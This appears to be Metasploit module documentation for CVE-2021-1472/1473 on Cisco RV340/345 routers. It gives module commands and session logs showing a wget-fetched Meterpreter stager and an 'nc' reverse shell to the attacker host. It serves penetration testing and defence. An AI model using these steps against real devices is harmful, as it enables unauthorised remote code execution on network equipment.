## Vulnerable Application

### Description

This module exploits an authentication bypass (CVE-2021-1472) and command injection (CVE-2021-1473)
in the Cisco Small Business RV series of VPN/routers. The device does not adequately verify the
credentials in the HTTP Authorization field when requests are made to the /upload endpoint. Then
the upload.cgi binary will use the contents of the HTTP Cookie field as part of a `curl` request
aimed at an internal endpoint. The curl request is executed using `popen` and allows the attacker
to inject commands via the Cookie field.

A remote and unauthenticated attacker using this module is able to achieve code execution as `www-data`.

This module affects the RV340, RV340w, RV345, and RV345P using firmware versions 1.0.03.20 and below.

### Installation

The Cisco Small Business RV Series VPN/Router is a physical device and is not known to have been
successfully emulated. However, if you have a device, affected firmware can be downloaded here:

* https://software.cisco.com/download/home/286287791/type/282465789/release/1.0.03.20?catid=268437899

## Verification Steps

* Acquire an affected device and configure it with the affected firmware
* Do: `use exploit/linux/http/cisco_rv_series_authbypass_and_rce`
* Do: `set RHOST <ip>`
* Do: `check`
* Verify the remote target is flagged as likely vulnerable
* Do: `set LHOST <ip>`
* Do: `exploit`
* You should get a reverse shell.

## Targets

### 0

This targets the VPN/Router with the `reverse_netcat` payload and returns a reverse shell.

### 1

This target obtains a meterpreter session using `wget` by default, but `curl` also works.
Exploitation of the target should work 100% of the time against vulnerable hosts. However,
at the time of writing, Meterpreter is crashing about 50% of the time after being
downloaded by the initial payload.

## Options

### TARGETURI

Specifies base URI. The default value is `/`.

## Scenarios

### Cisco RV340 using firmware version 1.0.03.20. Reverse shell to meterpreter session.

```
msf > use exploits/linux/http/cisco_rv_series_authbypass_and_rce
[*] Using configured payload cmd/unix/reverse_netcat
msf exploit(linux/http/cisco_rv_series_authbypass_and_rce) > set RHOST 10.0.0.8
RHOST => 10.0.0.8
msf exploit(linux/http/cisco_rv_series_authbypass_and_rce) > set LHOST 10.0.0.6
LHOST => 10.0.0.6
msf exploit(linux/http/cisco_rv_series_authbypass_and_rce) > set target 1
target => 1
msf exploit(linux/http/cisco_rv_series_authbypass_and_rce) > run

[*] Started reverse TCP handler on 10.0.0.6:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The device responded to exploitation with a 200 OK.
[*] Executing Linux Dropper for linux/armle/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/RIwkKfR
[*] Local IP: http://10.0.0.6:8080/RIwkKfR
[*] Client 10.0.0.8 (Wget) requested /RIwkKfR
[*] Sending payload to 10.0.0.8 (Wget)
[*] Sending stage (903400 bytes) to 10.0.0.8
[+] Exploit successfully executed.
[*] Meterpreter session 1 opened (10.0.0.6:4444 -> 10.0.0.8:34201 ) at 2022-01-29 18:48:24 -0800
[*] Command Stager progress - 100.00% done (108/108 bytes)
[*] Server stopped.

meterpreter > shell
Process 2545 created.
Channel 1 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux router0B874A 4.1.8 #2 SMP Thu Sep 17 09:26:06 IST 2020 armv7l GNU/Linux
ps faux
    1 root      2476 S    /sbin/procd
    2 root         0 SW   [kthreadd]
    3 root         0 SW   [ksoftirqd/0]
    5 root         0 SW<  [kworker/0:0H]
    6 root         0 SW   [kworker/u4:0]
    7 root         0 SW   [rcu_sched]
    8 root         0 SW   [rcu_bh]
    9 root         0 SW   [migration/0]
   10 root         0 SW   [migration/1]
   11 root         0 SW   [ksoftirqd/1]
   12 root         0 SW   [kworker/1:0]
   13 root         0 SW<  [kworker/1:0H]
   14 root         0 SW<  [khelper]
   15 root         0 SW<  [perf]
   16 root         0 SW   [kworker/u4:1]
  242 root         0 SW<  [writeback]
  243 root         0 SW<  [crypto]
  245 root         0 SW   [kworker/0:1]
  246 root         0 SW<  [bioset]
  247 root         0 SW<  [kblockd]
  301 root         0 SW   [kswapd0]
  338 root         0 SW   [scsi_eh_0]
  339 root         0 SW<  [scsi_tmf_0]
  342 root         0 SW   [scsi_eh_1]
  343 root         0 SW<  [scsi_tmf_1]
  381 nobody    1968 S    /usr/sbin/dnsmasq -C /var/etc/dnsmasq.conf
  467 root         0 SW<  [dwc_otg]
  468 root         0 SW   [kworker/1:2]
  471 root         0 SW<  [ipv6_addrconf]
  545 root         0 SW<  [deferwq]
  550 root         0 SW   [ubi_bgt0d]
  553 root         0 SW   [ubifs_bgt0_0]
  851 root      1752 S    /sbin/ubusd
 1006 root      1772 S    /sbin/askfirst /bin/login
 2378 root         0 SW   [yaffs-bg-1]
 2380 root         0 SW   [yaffs-bg-1]
 2382 root         0 SW   [yaffs-bg-1]
 2384 root         0 SW   [yaffs-bg-1]
 2402 root         0 DW   [pfe_ctrl_timer]
 2518 www-data  1060 S    /tmp/jUehMqxi
 2536 root         0 SW   [ocf_0]
 2537 root         0 SW   [ocf_ret_0]
 2538 root         0 SW   [ocf_1]
 2539 root         0 SW   [ocf_ret_1]
 2545 www-data  3116 S    /bin/sh
 2623 root      2984 S    sleep 5
 2624 www-data  3228 R    ps faux
 2710 root         0 SW   [ocf-random]
 2821 root         0 SW<  [abm_wq]
 2990 root         0 SW   [pptp_th_1]
 3180 root      1796 S    /sbin/hotplug2 --override --persistent --set-rules-f
 3259 root         0 DW   [c2krv340_reset]
 4318 root     18112 S    /usr/bin/xosdsd
 4484 root      3116 S    {ch_agent_monito} /bin/sh /usr/bin/ch_agent_monitor
 4488 root      135m S    /usr/bin/call_home_agent -c /etc/license/ch_config
 4637 root      3116 S    {smart_agent_mon} /bin/sh /usr/bin/smart_agent_monit
 4645 root     69976 S    /usr/bin/smart_agent -c /mnt/license -i /etc/license
 5056 root      1652 S    rtupd
 5070 root      2408 S    /sbin/netifd
 5482 root     43952 S    /usr/lib/confd/erts/bin/confd -K false -B -MHe true
 5561 root      6632 S    ucicfg_init -c /tmp/etc/config/ -m /mnt/configcert/c
 5588 root      6636 S    ucicfg_hook
 5712 root      6640 S    ucicfg_network -c /tmp/etc/config/ -m /mnt/configcer
 5728 root      6640 S    ucicfg_security -c /tmp/etc/config/ -m /mnt/configce
 5752 root      6640 S    ucicfg_system -c /tmp/etc/config/ -m /mnt/configcert
 6554 root         0 SW   [kworker/0:2]
 6662 root      6896 S    operdb_stats
 6663 root     14112 S    opsdb_cisco
 6915 root      6636 S    ucicfg_aaa
 7034 root      6636 S    ucicfg_license
 7057 www-data  6740 S    webcache
 7133 root      3116 S    udhcpc -p /var/run/udhcpc-eth0.pid -s /lib/netifd/dh
 7135 root      3116 S    udhcpc -p /var/run/udhcpc-eth2.pid -s /lib/netifd/dh
 7199 root      3308 S    ntpd -d -p 0.ciscosb.pool.ntp.org -p 1.ciscosb.pool.
 7281 network   3024 S    /usr/sbin/zebra -d
 7285 network   2816 S    /usr/sbin/ripd -d
 7289 network   2800 S    /usr/sbin/ripngd -d
 7295 root      2520 S    /usr/sbin/watchquagga -d -z -T 60 -R /usr/sbin/quagg
 7843 root      2112 S    /usr/sbin/dropbear -F -P /var/run/dropbear.1.pid -p
 8188 root      3116 S    {mwan3track} /bin/sh /usr/sbin/mwan3track wan1 eth2 
 8296 root     30504 S    /usr/bin/cmm -f /etc/config/fastforward
 8668 root      1808 S    xl2tpd
 9889 root     16316 S    /usr/bin/python /usr/lib/python2.7/site-packages/pnp
10630 root      9072 S <  decomp_server
10632 root     12948 S    casa
10684 root      1884 S    lcavc
10750 root     14248 S    lcstat daemon
10851 root      2152 S    /usr/sbin/lldpd -I eth3*
10857 root     10124 S    /usr/sbin/lldpd -I eth3*
10873 root     80496 S    wfapp 50001 42 1 0 0 RV340-WB PSZ24161FA9
10986 root      6216 S    {vpnTimer} /usr/bin/perl -w /usr/sbin/vpnTimer
10987 root      6084 S    {vpnLed} /usr/bin/perl -w /usr/sbin/vpnLed
11055 root      3432 S    /usr/lib/ipsec/starter --daemon charon
11056 root      137m S    /usr/lib/ipsec/charon --use-syslog --debug-chd 2 --d
11058 root     16316 S    /usr/bin/python /usr/lib/python2.7/site-packages/pnp
12037 root      4624 S    notifyd -i 127.0.0.1
12055 root     16212 S    nginx: master process /usr/sbin/nginx
12065 www-data  7456 S    uwsgi -m --ini /etc/uwsgi/jsonrpc.ini
12066 www-data  7124 S    uwsgi -m --ini /etc/uwsgi/blockpage.ini
12067 www-data  7124 S    uwsgi -m --ini /etc/uwsgi/upload.ini
12111 www-data  7216 S    uwsgi -m --ini /etc/uwsgi/upload.ini
12112 www-data  7548 S    uwsgi -m --ini /etc/uwsgi/jsonrpc.ini
12113 www-data  7548 S    uwsgi -m --ini /etc/uwsgi/jsonrpc.ini
12114 www-data  7124 S    uwsgi -m --ini /etc/uwsgi/blockpage.ini
12115 www-data  7548 S    uwsgi -m --ini /etc/uwsgi/jsonrpc.ini
12116 www-data  7548 S    uwsgi -m --ini /etc/uwsgi/jsonrpc.ini
12444 root     24804 S    /usr/bin/snmpglue -n 1
12794 root      3224 S    /usr/sbin/crond -c /mnt/configcert/crontabs -l 5
14266 root      5128 S    {syslog-ng} supervising syslog-ng
14267 root      5480 S    /usr/sbin/syslog-ng -f /tmp/syslog-ng.conf
28966 www-data  3116 S    sh -c curl http://127.0.0.1/jsonrpc.cgi --cookie 'se
28967 www-data  3116 S    sh -c curl http://127.0.0.1/jsonrpc.cgi --cookie 'se
28969 www-data  3116 S    nc 10.0.0.6 4444
28970 www-data  3116 S    /bin/sh
30804 nobody    2676 S    avahi-daemon: running [router0B874A.local]
30855 www-data 16372 S    nginx: worker process
30856 www-data 16212 S    nginx: worker process
30857 www-data 16212 S    nginx: worker process
30858 www-data 16368 S    nginx: worker process
```

### Cisco RV340 using firmware version 1.0.03.20. Reverse shell with reverse netcat.

```
msf > use exploits/linux/http/cisco_rv_series_authbypass_and_rce
[*] Using configured payload cmd/unix/reverse_netcat
msf exploit(linux/http/cisco_rv_series_authbypass_and_rce) > set RHOST 10.0.0.8
RHOST => 10.0.0.8
msf exploit(linux/http/cisco_rv_series_authbypass_and_rce) > set LHOST 10.0.0.6
LHOST => 10.0.0.6
msf exploit(linux/http/cisco_rv_series_authbypass_and_rce) > run

[*] Started reverse TCP handler on 10.0.0.6:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The device responded to exploitation with a 200 OK.
[*] Executing Unix Command for cmd/unix/reverse_netcat
[*] Command shell session 1 opened (10.0.0.6:4444 -> 10.0.0.8:34155 ) at 2022-01-29 18:46:01 -0800
[+] Exploit successfully executed.

uname -a
Linux router0B874A 4.1.8 #2 SMP Thu Sep 17 09:26:06 IST 2020 armv7l GNU/Linux
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
netstat -tlpn
netstat: showing only processes with your user ID
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:12321         0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8866          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:9000          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:5000          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8008          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:9001          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:2601            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:2602            0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:9003          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:2603            0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:54316         0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      30855/nginx: worker
tcp        0      0 127.0.0.1:2001          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:9010          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:53              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:4565          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:2103          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:47864         0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN      30855/nginx: worker
tcp        0      0 0.0.0.0:830             0.0.0.0:*               LISTEN      -
tcp        0      0 :::2601                 :::*                    LISTEN      -
tcp        0      0 :::2602                 :::*                    LISTEN      -
tcp        0      0 :::2603                 :::*                    LISTEN      -
tcp        0      0 :::80                   :::*                    LISTEN      30855/nginx: worker
tcp        0      0 :::53                   :::*                    LISTEN      -
tcp        0      0 :::22                   :::*                    LISTEN      -
tcp        0      0 :::443                  :::*                    LISTEN      30855/nginx: worker
tcp        0      0 :::830                  :::*                    LISTEN      -
```

### Cisco RV340 using firmware version 1.0.03.21. Failure to exploit.

```
[*] Using configured payload cmd/unix/reverse_netcat
msf exploit(linux/http/cisco_rv_series_authbypass_and_rce) > set RHOST 10.0.0.8
RHOST => 10.0.0.8
msf exploit(linux/http/cisco_rv_series_authbypass_and_rce) > check

[*] 10.0.0.8:443 - The target is not exploitable. The target did not respond with a 200 OK.
msf exploit(linux/http/cisco_rv_series_authbypass_and_rce) > 
```
